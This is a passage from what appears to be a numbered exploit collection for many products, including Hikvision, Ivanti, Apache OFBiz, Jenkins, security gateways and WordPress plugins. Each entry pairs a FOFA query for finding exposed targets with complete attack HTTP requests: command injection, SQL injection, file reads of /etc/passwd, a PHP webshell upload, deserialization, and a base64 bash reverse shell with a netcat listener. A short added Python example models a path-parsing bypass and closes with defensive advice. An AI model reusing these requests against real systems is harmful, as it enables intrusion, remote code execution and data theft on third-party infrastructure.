Accept-Encoding: gzip

PAYLOAD

The accountId traversal makes the server write the uploaded archive into Tomcat's webapps directory, where it is deployed as a web application.
Webshell URL: http://x.x.x.x/userfiles/index.jsp
( G" P) k( F. ]* n0 z86. 日本tosei自助洗衣机RCE
; x# h* P& }. g" @6 mFOFA:body="tosei_login_check.php"
! @: g. ]( C l& `& P- d) SPOST /cgi-bin/network_test.php HTTP/1.1
@' I# [2 P* Z% D; ?! D2 t$ EHost: x.x.x.x* ]" U( ~0 D+ F! h
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36+ Z. t* T7 A8 h6 q1 e8 s
Connection: close. D1 }! L+ p* r I7 n/ E
Content-Length: 441 z' Q8 O) j/ `5 N6 i
Accept: */*
( F7 ]- K, M7 f1 H( b& m7 MAccept-Encoding: gzip
! W( C3 m% B* B$ ]Accept-Language: en
. }4 ^( B2 D/ y- @Content-Type: application/x-www-form-urlencoded z0 A; v+ [, k( d
* X. ?1 `3 p( ^9 w# r
host=%0acat${IFS}/etc/passwd%0a&command=ping
7 m* ^8 O& b1 ~( B6 V: S% E: `) z6 w' E. v& w- E" [7 R
/ D. W1 ]1 L4 t; z$ ^
87. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter is appended to the preview path; its ../ sequence moves the saved file to the web root, where it is reachable as /jfhatuwe.php.

88. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type value, decoded, is a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, which runs as a separate shell command. Then request /txzfsrur.php (the name written by the payload) and look for the marker string.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The .js%70 suffix is .jsp with the p percent-encoded: the authentication filter matches the literal .js extension of a static resource while the container decodes the path and runs editflow_manager.jsp. The response contains 24642 (111*222) when the injection works.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

With jsondata[type]=99 the ip value is executed as the command itself rather than passed to ping; the output of ipconfig is returned in the response.

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Two traversals are combined: the ..;/ segment is a servlet path parameter that the front gateway leaves alone but the servlet container strips before normalising, so a request that passes the gateway's /center/api/task/ rule is routed to orgManage/v1/orgs/download; the fileName traversal then reads an arbitrary file, which is returned in the response.

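Item 91 works because two components read the same path differently. The added example below (mine, not from the original article, and a model of the behaviour rather than code from any gateway or container) resolves the request-target both ways: a gateway that resolves dot segments but treats ..; as an ordinary name, and a servlet container that strips the ;-delimited path parameter from every segment before resolving dot segments. It then reports whether a prefix rule on the gateway is fooled. ITEM_91 is the request-target from the entry above; everything else is mine.

```python
def _collapse(segments):
    """Resolve '.' and '..' the way RFC 3986 remove_dot_segments does."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def proxy_view(raw_target):
    """Path as a front proxy or gateway sees it: dot segments are resolved, but a
    segment such as '..;' is an ordinary literal name, so nothing is stepped back."""
    return _collapse(raw_target.split("?", 1)[0].split("/"))


def servlet_container_view(raw_target):
    """Path as the servlet container resolves it: the ';...' path parameter is
    stripped from every segment first, turning '..;' into '..', and only then
    are dot segments resolved."""
    path = raw_target.split("?", 1)[0]
    return _collapse(seg.split(";", 1)[0] for seg in path.split("/"))


def is_confused(raw_target, allowed_prefix):
    """True when a prefix rule on the gateway passes the request but the
    container routes it to a handler outside that prefix."""
    return (proxy_view(raw_target).startswith(allowed_prefix)
            and not servlet_container_view(raw_target).startswith(allowed_prefix))


ITEM_91 = "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd"

if __name__ == "__main__":
    print(proxy_view(ITEM_91))              # /center/api/task/..;/orgManage/v1/orgs/download
    print(servlet_container_view(ITEM_91))  # /center/api/orgManage/v1/orgs/download
    print(is_confused(ITEM_91, "/center/api/task/"))  # True
```

A plain /center/api/task/../orgManage/... is not confused in this model, because the gateway resolves the ordinary .. itself and the prefix rule then fails; that is why the published request needs the path parameter. The defensive consequence is that access rules must be evaluated on the path as the container will dispatch it, or the gateway must reject any segment containing ;.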
92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization; the command to run is passed in the Testcmd header.
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin (奇安信) Wangshen (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The import handler stores the upfile part under its original name in the attachements directory without authentication. Then fetch it:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin (奇安信) Wangshen (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Same handler family and storage location as item 93. Then fetch the file under the name given in the upfile part:

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php.

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
